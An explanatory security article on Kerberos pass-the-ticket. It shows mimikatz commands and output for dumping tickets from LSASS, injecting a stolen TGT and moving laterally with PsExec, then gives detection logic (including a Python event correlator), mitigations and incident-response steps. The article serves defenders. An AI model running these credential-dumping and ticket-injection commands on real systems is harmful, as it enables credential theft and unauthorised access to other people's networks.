Pass-the-ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g. file shares and other computers) as a user without compromising that user’s password. This technique is often used by adversaries to move laterally through an organization’s network while hunting for opportunities to escalate privileges or fulfill their mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGTs) can be stolen and reused by adversaries. Without administrative privileges, an adversary can retrieve every TGS ticket in the current user's own logon session through the normal LSA ticket-retrieval API, and can obtain the user's TGT by "fake delegation": requesting a service ticket for a host trusted for unconstrained delegation, which makes the Kerberos provider place a forwarded copy of the TGT in the AP-REQ, where it can be decrypted with the service ticket's session key that the same API hands back to the user. With administrative privileges, an adversary can read the memory of the LSASS process and obtain every TGT and TGS ticket cached on the system, for all logged-on users.
How Pass-the-Ticket Works
Step 1: An adversary uses a tool like mimikatz to extract Kerberos tickets from the memory of the LSASS process.
########
# In order to capture TGTs, this invocation of mimikatz must be run from an
# elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"

########
# mimikatz outputs all tickets to screen, and writes them individually to files
# in the current directory. We have truncated the output to show a single session.
########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 03/07/2020 08:07:58
SID               : S-1-5-21-3501040295-3816137123-30697657-1109

         * Username : joed
         * Domain   : DOMAIN.COM
         * Password : (null)

        Group 0 - Ticket Granting Service
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
           Target Name  (03) : host ; host.domain.com ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-email@example.com !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
           Target Name  (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !

PS>
Step 2: Next, the threat actor uses mimikatz.exe kerberos::ptt (or a tool with similar capabilities) to inject the stolen TGT into their own logon session. The session's local token and identity do not change (whoami still shows the attacker), but every subsequent Kerberos authentication from that session presents joed's TGT, so remote resources see joed.
PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"

* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK

PS> # The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"

 - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
   Server Name       : krbtgt/DOMAIN.COM @ DOMAIN.COM
   Client Name       : joed @ DOMAIN.COM
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

PS>
Step 3: Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used. A stolen TGS ticket is only good for the service principal it was issued to (the Service Name field in the mimikatz output, host/host.domain.com in the example above), so its target can be read straight off the ticket. A stolen TGT, by contrast, can be exchanged for a service ticket to any service in the domain, so the attacker usually has to conduct internal reconnaissance to learn which resources the user holds meaningful privileges on.
This may be as straightforward as querying the user's group memberships looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can "live off the land" and use built-in commands like net to discover these details.
PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.

User name                    joed
Full Name                    Joe Dibley
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/15/2020 3:42:00 PM
Password expires             Never
Password changeable          6/16/2020 3:42:00 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/9/2020 6:26:56 PM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Workstation Administrators *VPNUser
                             *FileServer1_PublicShare *Domain Users
The command completed successfully.

PS>
Step 4: Using the stolen ticket and the information about the user's privileges gleaned from internal reconnaissance, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives. Here the attacker, whose session now carries joed's TGT, runs PsExec against workstation456, where joed's Workstation Administrators membership grants local administrator rights. The KDC issues the service ticket for workstation456 on the strength of the injected TGT, and that service-ticket request, arriving from the attacker's host rather than the one joed logged on from, is exactly the signal the Active Directory detection described later keys on.
PS> .\PsExec.exe \\workstation456 powershell.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS> hostname
workstation456
PS>
Detect, Mitigate, and Respond
Endpoints and Active Directory are both sources of signals indicating active use of pass-the-ticket in an environment.
Detection on the endpoint is accomplished by:
- Detecting processes that read the memory of LSASS.exe to retrieve Kerberos tickets, or that submit tickets to it to inject them. Many Endpoint Detection and Response solutions are capable of this, and Sysmon ProcessAccess events (Event ID 10) targeting lsass.exe give the same signal without a commercial EDR; or,
- Analyzing logged-on sessions for a username mismatch in the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.
Detection in Active Directory can be accomplished by collecting the following Kerberos event types from every domain controller (the TGT and a later service ticket may be issued by different DCs) and correlating them:
- Develop a ledger of when a ticket-granting ticket was issued to a user and on which endpoint. Auditing of A Kerberos Authentication Ticket (TGT) was requested (Event ID 4768) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to obtain these data points.
- Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. Auditing of A Kerberos Service Ticket was requested (Event ID 4769) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to perform this analysis.
The volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred. It is also not possible to detect the theft and use of a single service ticket (TGS) within Active Directory: presenting a service ticket to its target involves no exchange with a domain controller, so the only record is the logon event on the service host itself.
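The ledger correlation described in the two bullets above, as an added example in Python (not the article's own tooling). Successful 4768 events and krbtgt 4770 renewals populate a ledger of which endpoints hold a TGT for each user; every 4769 is then checked against it, and a service-ticket request from an endpoint that never obtained that user's TGT is reported. The event records are constructed to mirror the fields of the real Security events (TargetUserName, ServiceName, IpAddress, Status, Computer) and include two details that trip up naive correlators: 4769 logs the user as joed@DOMAIN.COM while 4768 logs joed, and IPv4 clients appear as IPv4-mapped IPv6 addresses.

```python
"""Correlate TGT issuance (4768) and renewal (4770) with service-ticket
requests (4769) to flag a TGS request from an endpoint that never obtained a
TGT for that user: the Active Directory side signal of a replayed TGT.

Added example for this article, not the article's own tooling. Events are
constructed; in practice they must be gathered from every domain controller.
"""
from collections import defaultdict

# Constructed sample, time-ordered, as if merged from DC1 and DC2.
SAMPLE_EVENTS = [
    # joed logs on at workstation123 (10.0.0.25): TGT issued.
    {"EventID": 4768, "TargetUserName": "joed", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.25", "Status": "0x0", "Computer": "DC1"},
    # Normal TGS request from the same endpoint.
    {"EventID": 4769, "TargetUserName": "joed@DOMAIN.COM",
     "ServiceName": "cifs/fileserver1.domain.com",
     "IpAddress": "::ffff:10.0.0.25", "Status": "0x0", "Computer": "DC1"},
    # Pre-authentication failure (0x18): no TGT issued, must not enter the ledger.
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.40", "Status": "0x18", "Computer": "DC2"},
    # joed's TGT renewed from the same endpoint (4770 carries no Status field).
    {"EventID": 4770, "TargetUserName": "joed", "ServiceName": "krbtgt",
     "IpAddress": "::ffff:10.0.0.25", "Computer": "DC2"},
    # joed's TGT replayed from 10.0.0.77, a host that never received it.
    {"EventID": 4769, "TargetUserName": "joed@DOMAIN.COM",
     "ServiceName": "host/workstation456.domain.com",
     "IpAddress": "::ffff:10.0.0.77", "Status": "0x0", "Computer": "DC2"},
    # No TGT issuance seen for bob at all (collection may have started too late).
    {"EventID": 4769, "TargetUserName": "bob@DOMAIN.COM",
     "ServiceName": "ldap/dc1.domain.com",
     "IpAddress": "::ffff:10.0.0.99", "Status": "0x0", "Computer": "DC1"},
]


def norm_user(name):
    """4768 logs 'joed' while 4769 logs 'joed@DOMAIN.COM'; compare the bare name."""
    return name.split("@", 1)[0].lower()


def norm_ip(addr):
    """IPv4 clients are logged as IPv4-mapped IPv6 addresses ('::ffff:10.0.0.25')."""
    addr = addr.lower()
    return addr[len("::ffff:"):] if addr.startswith("::ffff:") else addr


def correlate(events):
    """Build the TGT ledger (user -> endpoints holding a TGT) and check every
    TGS request against it. Returns findings in event order."""
    ledger = defaultdict(set)
    findings = []
    for ev in events:
        if ev.get("Status", "0x0") != "0x0":
            continue  # failed requests issue no ticket
        user = norm_user(ev["TargetUserName"])
        ip = norm_ip(ev["IpAddress"])
        eid = ev["EventID"]
        is_tgt = ev["ServiceName"].lower().startswith("krbtgt")
        if eid == 4768 or (eid == 4770 and is_tgt):
            ledger[user].add(ip)
        elif eid == 4769:
            if user not in ledger:
                findings.append({"severity": "low", "user": user, "ip": ip,
                                 "service": ev["ServiceName"], "dc": ev["Computer"],
                                 "reason": "no TGT issuance or renewal seen for this user"})
            elif ip not in ledger[user]:
                findings.append({"severity": "high", "user": user, "ip": ip,
                                 "service": ev["ServiceName"], "dc": ev["Computer"],
                                 "reason": "TGT was issued only to %s" % sorted(ledger[user])})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print("[%s] %s requested %s from %s via %s: %s"
              % (f["severity"].upper(), f["user"], f["service"], f["ip"], f["dc"], f["reason"]))
```

A production version needs a warm-up window at least as long as the maximum TGT renewal lifetime (seven days under the default domain policy) before "no TGT seen" findings mean anything, and should expire ledger entries on the same timescale. Legitimate address changes (VPN reconnects, NAT, users who log on to several machines) are the main source of noise; the per-user set of endpoints absorbs the last of these, the first two need an allow-list.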
While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:
- Enable Microsoft's Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard uses virtualization-based security to keep LSA secrets, including NTLM hashes and Kerberos TGTs, in an isolated process that the normal operating system cannot read even with administrative rights, so dumping LSASS no longer yields a usable TGT. It does not stop an attacker from submitting a ticket they already hold through the normal Kerberos API, so it raises the cost of theft rather than removing the technique.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.
Should the use of pass-the-ticket be detected, there are several actions one can take to immediately respond:
- Reset the compromised user's password, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket. Note that a password reset by itself does not invalidate tickets already issued: a stolen TGT keeps working for service-ticket requests until it expires or the account is disabled, and a stolen service ticket remains valid at its target service until it expires regardless of either action, which is why the affected hosts must also be isolated.
- Reset the password for all users who have logged on to an impacted machine.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
- Activate the incident response process and alert the response team.